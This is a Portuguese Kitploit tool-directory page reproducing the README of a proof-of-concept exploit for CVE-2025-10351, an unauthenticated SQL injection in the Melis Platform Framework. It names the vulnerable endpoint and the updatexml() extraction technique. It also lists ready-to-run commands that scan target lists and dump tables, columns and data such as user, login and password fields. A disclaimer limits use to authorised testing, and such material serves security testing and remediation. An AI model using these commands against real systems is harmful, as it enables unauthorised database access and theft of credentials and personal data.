Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-10351-POC — Exploit para CVE-2025-10351. Injeção de SQL no Melis Platform Framework. | Kitploit
Ferramentas/GitHubGitHub/ivansmc/cve-2025-10351-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

Exploit para CVE-2025-10351. Injeção de SQL no Melis Platform Framework.

Ver Repositório
12há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-10351 POC - Exploração de Injeção SQL 💉

POC para CVE-2025-10351: Uma vulnerabilidade de Injeção SQL não autenticada que afeta um endpoint específico no Melis Platform Framework.

status python status


🔗 Referências

  • 📄 CVE-2025-10351 no MITRE
  • 📄 Aviso do Melis Platform no INCIBE (Instituto Nacional de Cibersegurança da Espanha)

🚀 Descrição

Este POC tem como alvo uma vulnerabilidade de injeção SQL baseada em erro não autenticada no endpoint:

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

Ele utiliza updatexml() no MySQL para extrair:

  • Nomes de tabelas
  • Nomes de colunas
  • Dados de colunas específicas ou todas

Também detecta possíveis vetores de SQLi baseado em tempo para exploração manual adicional.


🛠️ Requisitos

Instale as dependências com:

root@kitploit:~
pip3 install -r requirements.txt

🧪 Uso

Verificação básica

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

A partir de uma lista de URLs

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

Extrair todos os nomes de tabelas

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

Extrair todos os nomes de colunas de uma tabela

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

Extrair todos os dados de todas as colunas

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

Extrair colunas específicas

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

Usando proxy com modo inseguro, cookies e modo de depuração

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ Opções

ArgumentDescription
-uURL alvo
-pPorta (80, 443, etc.)
-lArquivo contendo lista de URLs
-sTempo de espera para testes baseados em tempo (padrão: 1s)
-atExtrair todos os nomes de tabelas
-tEspecificar nome da tabela
-acExtrair todas as colunas da tabela fornecida
-cLista separada por vírgulas de colunas para extrair
--proxyProxy Burp http://127.0.0.1:8080
--insecureDesabilitar verificações TLS ao usar conexões de proxy
--cookieCookies para requisições autenticadas
--debugModo de depuração

📤 Saída

  • Tabelas extraídas salvas em tables_extracted.txt
  • Dados extraídos salvos em <table_name>_data.txt

⚠️ Aviso Legal

Este documento é apenas para testes de segurança autorizados e remediação. Não use o PoC ou as etapas de reprodução contra sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não se responsabiliza pelo uso indevido.


Feito com ❤️ por Manuel Iván San Martín Castillo

Baixar ferramenta